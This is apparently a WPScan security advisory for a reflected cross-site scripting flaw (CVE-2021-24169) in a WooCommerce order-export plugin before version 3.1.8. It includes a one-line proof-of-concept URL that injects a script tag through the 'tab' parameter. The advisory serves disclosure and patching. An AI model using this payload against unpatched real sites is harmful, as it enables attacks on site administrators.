logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

Advanced Order Export For WooCommerce < 3.1.8 - Authenticated Reflected Cross-Site Scripting (XSS)

Description

This plugin helps you to easily export WooCommerce order data. The tab parameter in the Admin Panel was vulnerable to authenticated reflected XSS.

Proof of Concept

wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(/XSS/)</script>

Affects Plugins

woo-order-export-lite

Fixed in version 3.1.8

References

CVE

CVE-2021-24169

URL

https://0xb9.blog/cross-site-scripting-fixed-in-advanced-order-export-for-woocommerce/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

Miscellaneous

Original Researcher

0xB9

Submitter twitter

0xB9sec

Verified

Yes

WPVDB ID

09681a6c-57b8-4448-982a-fe8d28c87fc3

Timeline

Publicly Published

2021-03-03 (about 4 months ago)

Added

2021-03-03 (about 4 months ago)

Last Updated

2021-05-13 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin